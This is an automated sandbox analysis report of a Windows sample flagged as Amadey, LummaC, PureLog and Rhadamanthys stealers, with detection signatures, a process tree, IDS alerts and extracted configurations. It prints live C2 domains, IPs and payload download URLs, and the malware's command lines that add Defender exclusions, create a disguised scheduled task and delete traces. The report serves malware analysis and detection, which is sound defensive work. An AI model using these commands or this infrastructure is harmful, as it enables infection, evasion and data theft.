Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1578014
MD5:61cb850896f4b6aac18c72e82eb9ac90
SHA1:c1fcdd242b13e4c5ad99f7e76da886288622b6dc
SHA256:c2bee3616cf5c0f19ecc5738ee39a8c3d0d0523c2178177b86563d5a3d758d0f
Tags:exeuser-Bitsight
Infos:

Detection

Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected PureLog Stealer
Yara detected RHADAMANTHYS Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Checks if the current machine is a virtual machine (disk enumeration)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides threads from debuggers
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses ping.exe to check the status of other devices and networks
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • file.exe (PID: 3584 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 61CB850896F4B6AAC18C72E82EB9AC90)
    • skotes.exe (PID: 7184 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 61CB850896F4B6AAC18C72E82EB9AC90)
  • skotes.exe (PID: 6692 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 61CB850896F4B6AAC18C72E82EB9AC90)
  • skotes.exe (PID: 7832 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 61CB850896F4B6AAC18C72E82EB9AC90)
    • zudFSfy.exe (PID: 8048 cmdline: "C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exe" MD5: EF08A45833A7D881C90DED1952F96CB4)
      • zudFSfy.exe (PID: 2144 cmdline: "C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exe" MD5: EF08A45833A7D881C90DED1952F96CB4)
    • kz8ZdyP.exe (PID: 4916 cmdline: "C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe" MD5: 68C0E4EEFD4C6A76CFF542EF57A49CA2)
      • kz8ZdyP.exe (PID: 7276 cmdline: "C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe" MD5: 68C0E4EEFD4C6A76CFF542EF57A49CA2)
      • kz8ZdyP.exe (PID: 7280 cmdline: "C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe" MD5: 68C0E4EEFD4C6A76CFF542EF57A49CA2)
    • e56fffc2ce.exe (PID: 7320 cmdline: "C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe" MD5: 14BECDF1E2402E9AA6C2BE0E6167041E)
      • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4476 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath "C:\unrlkpjy" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5064 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ac68c6b737.exe (PID: 5012 cmdline: "C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exe" MD5: C29EB2D3C39A0A808F1910E0E222AC94)
      • svchost.exe (PID: 1260 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • WerFault.exe (PID: 6856 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 684 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • 54326d271c.exe (PID: 3352 cmdline: "C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exe" MD5: 3A425626CBD40345F5B8DDDD6B2B9EFA)
      • cmd.exe (PID: 3588 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mode.com (PID: 5272 cmdline: mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875)
        • 7z.exe (PID: 2860 cmdline: 7z.exe e file.zip -p24291711423417250691697322505 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 4888 cmdline: 7z.exe e extracted/file_7.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 3488 cmdline: 7z.exe e extracted/file_6.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 1832 cmdline: 7z.exe e extracted/file_5.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 3492 cmdline: 7z.exe e extracted/file_4.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 5212 cmdline: 7z.exe e extracted/file_3.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 5916 cmdline: 7z.exe e extracted/file_2.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 7536 cmdline: 7z.exe e extracted/file_1.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • attrib.exe (PID: 1868 cmdline: attrib +H "in.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
        • in.exe (PID: 3916 cmdline: "in.exe" MD5: 83D75087C9BF6E4F07C36E550731CCDE)
          • attrib.exe (PID: 5624 cmdline: attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
            • conhost.exe (PID: 4624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • attrib.exe (PID: 7716 cmdline: attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
            • conhost.exe (PID: 5552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 3452 cmdline: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • conhost.exe (PID: 1004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6036 cmdline: powershell ping 127.0.0.1; del in.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 2916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • PING.EXE (PID: 6196 cmdline: "C:\Windows\system32\PING.EXE" 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
    • 641d24797a.exe (PID: 4128 cmdline: "C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exe" MD5: 8A9CB17C0224A01BD34B46495983C50A)
      • conhost.exe (PID: 2132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • 641d24797a.exe (PID: 6280 cmdline: "C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exe" MD5: 8A9CB17C0224A01BD34B46495983C50A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
{"C2 url": ["grannyejh.lat", "discokeyus.lat", "aspecteirs.lat", "crosshuaht.lat", "necklacebudi.lat", "sustainskelet.lat", "rapeflowwj.lat", "energyaffai.lat", "sweepyribs.lat"], "Build id": "yau6Na--6989783370"}
{"C2 url": "https://198.251.84.107:9254/dc33e47f6acdb4eefe/ahbjmv76.0lxxe"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        C:\Users\user\AppData\Local\Temp\1017355001\96ae609d19.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          SourceRuleDescriptionAuthorStrings
          0000001B.00000002.2975513113.0000000000C1C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000009.00000002.2486574208.0000000003543000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              00000002.00000002.1782523187.0000000000B71000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                0000000D.00000002.2579288387.0000000003AB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  00000009.00000002.2499361350.0000000005A90000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    Click to see the 26 entries
                    SourceRuleDescriptionAuthorStrings
                    9.2.zudFSfy.exe.5a90000.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      9.2.zudFSfy.exe.434d790.5.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                        13.2.kz8ZdyP.exe.5260000.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                          13.2.kz8ZdyP.exe.3add790.5.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                            1.2.skotes.exe.b70000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                              Click to see the 8 entries

                              System Summary

                              barindex
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath "C:\unrlkpjy", CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath "C:\unrlkpjy", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe, ParentProcessId: 7320, ParentProcessName: e56fffc2ce.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath "C:\unrlkpjy", ProcessId: 4476, ProcessName: powershell.exe
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath "C:\unrlkpjy", CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath "C:\unrlkpjy", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe, ParentProcessId: 7320, ParentProcessName: e56fffc2ce.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath "C:\unrlkpjy", ProcessId: 4476, ProcessName: powershell.exe
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 3916, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 3452, ProcessName: schtasks.exe
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 3916, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 3452, ProcessName: schtasks.exe
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exe, ParentProcessId: 5012, ParentProcessName: ac68c6b737.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 1260, ProcessName: svchost.exe
                              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath "C:\unrlkpjy", CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath "C:\unrlkpjy", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe, ParentProcessId: 7320, ParentProcessName: e56fffc2ce.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath "C:\unrlkpjy", ProcessId: 4476, ProcessName: powershell.exe
                              Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exe, ParentProcessId: 5012, ParentProcessName: ac68c6b737.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 1260, ProcessName: svchost.exe
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T06:10:00.598029+010020283713Unknown Traffic192.168.2.449889104.21.66.85443TCP
                              2024-12-19T06:10:02.629214+010020283713Unknown Traffic192.168.2.449896104.21.66.85443TCP
                              2024-12-19T06:10:06.259068+010020283713Unknown Traffic192.168.2.449904104.21.66.85443TCP
                              2024-12-19T06:10:09.256260+010020283713Unknown Traffic192.168.2.449915104.21.66.85443TCP
                              2024-12-19T06:10:11.245334+010020283713Unknown Traffic192.168.2.449918104.21.64.80443TCP
                              2024-12-19T06:10:11.463654+010020283713Unknown Traffic192.168.2.449922104.21.66.85443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T06:10:01.388588+010020546531A Network Trojan was detected192.168.2.449889104.21.66.85443TCP
                              2024-12-19T06:10:03.424516+010020546531A Network Trojan was detected192.168.2.449896104.21.66.85443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T06:10:01.388588+010020498361A Network Trojan was detected192.168.2.449889104.21.66.85443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T06:10:03.424516+010020498121A Network Trojan was detected192.168.2.449896104.21.66.85443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T06:10:00.598029+010020583551Domain Observed Used for C2 Detected192.168.2.449889104.21.66.85443TCP
                              2024-12-19T06:10:02.629214+010020583551Domain Observed Used for C2 Detected192.168.2.449896104.21.66.85443TCP
                              2024-12-19T06:10:06.259068+010020583551Domain Observed Used for C2 Detected192.168.2.449904104.21.66.85443TCP
                              2024-12-19T06:10:09.256260+010020583551Domain Observed Used for C2 Detected192.168.2.449915104.21.66.85443TCP
                              2024-12-19T06:10:11.463654+010020583551Domain Observed Used for C2 Detected192.168.2.449922104.21.66.85443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T06:10:11.245334+010020583651Domain Observed Used for C2 Detected192.168.2.449918104.21.64.80443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T06:09:18.929929+010020446961A Network Trojan was detected192.168.2.449777185.215.113.4380TCP
                              2024-12-19T06:09:29.022935+010020446961A Network Trojan was detected192.168.2.449802185.215.113.4380TCP
                              2024-12-19T06:09:39.398379+010020446961A Network Trojan was detected192.168.2.449832185.215.113.4380TCP
                              2024-12-19T06:09:48.309941+010020446961A Network Trojan was detected192.168.2.449854185.215.113.4380TCP
                              2024-12-19T06:10:00.503455+010020446961A Network Trojan was detected192.168.2.449888185.215.113.4380TCP
                              2024-12-19T06:10:07.272105+010020446961A Network Trojan was detected192.168.2.449908185.215.113.4380TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T06:09:59.035230+010020583541Domain Observed Used for C2 Detected192.168.2.4543691.1.1.153UDP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T06:10:09.606669+010020583641Domain Observed Used for C2 Detected192.168.2.4586871.1.1.153UDP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T06:10:09.378332+010020583781Domain Observed Used for C2 Detected192.168.2.4532371.1.1.153UDP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T06:10:07.423552+010020480941Malware Command and Control Activity Detected192.168.2.449904104.21.66.85443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T06:09:05.500049+010028561471A Network Trojan was detected192.168.2.449748185.215.113.4380TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T06:09:15.968924+010028561221A Network Trojan was detected185.215.113.4380192.168.2.449754TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T06:09:11.525019+010028033053Unknown Traffic192.168.2.44976331.41.244.1180TCP
                              2024-12-19T06:09:20.397213+010028033053Unknown Traffic192.168.2.44978731.41.244.1180TCP
                              2024-12-19T06:09:35.500138+010028033053Unknown Traffic192.168.2.44982331.41.244.1180TCP
                              2024-12-19T06:09:41.147923+010028033053Unknown Traffic192.168.2.44983831.41.244.1180TCP
                              2024-12-19T06:09:49.770079+010028033053Unknown Traffic192.168.2.44986031.41.244.1180TCP
                              2024-12-19T06:10:01.955788+010028033053Unknown Traffic192.168.2.44989231.41.244.1180TCP
                              2024-12-19T06:10:09.176191+010028033053Unknown Traffic192.168.2.44991031.41.244.1180TCP

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: file.exeAvira: detected
                              Source: http://31.41.244.11/files/1293295511/zudFSfy.exeAvira URL Cloud: Label: phishing
                              Source: http://31.41.244.11/files/x3team/random.exeAvira URL Cloud: Label: phishing
                              Source: https://aspecteirs.lat/apiAvira URL Cloud: Label: malware
                              Source: http://31.41.244.11/files/1293295511/kz8ZdyP.exeAvira URL Cloud: Label: phishing
                              Source: http://31.41.244.11/files/lolz/random.exeAvira URL Cloud: Label: phishing
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeAvira: detection malicious, Label: HEUR/AGEN.1314134
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeAvira: detection malicious, Label: HEUR/AGEN.1352802
                              Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeAvira: detection malicious, Label: HEUR/AGEN.1352802
                              Source: 00000002.00000002.1782523187.0000000000B71000.00000040.00000001.01000000.00000007.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                              Source: 00000015.00000002.2763969121.0000000000159000.00000040.00000001.01000000.00000014.sdmpMalware Configuration Extractor: Rhadamanthys {"C2 url": "https://198.251.84.107:9254/dc33e47f6acdb4eefe/ahbjmv76.0lxxe"}
                              Source: 00000025.00000002.2961700266.0000000000A56000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["grannyejh.lat", "discokeyus.lat", "aspecteirs.lat", "crosshuaht.lat", "necklacebudi.lat", "sustainskelet.lat", "rapeflowwj.lat", "energyaffai.lat", "sweepyribs.lat"], "Build id": "yau6Na--6989783370"}
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeReversingLabs: Detection: 87%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exeReversingLabs: Detection: 71%
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeReversingLabs: Detection: 87%
                              Source: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exeReversingLabs: Detection: 71%
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 47%
                              Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeReversingLabs: Detection: 66%
                              Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeReversingLabs: Detection: 66%
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeReversingLabs: Detection: 60%
                              Source: file.exeVirustotal: Detection: 53%Perma Link
                              Source: file.exeReversingLabs: Detection: 47%
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\1017355001\96ae609d19.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\zudFSfy[1].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\kz8ZdyP[1].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
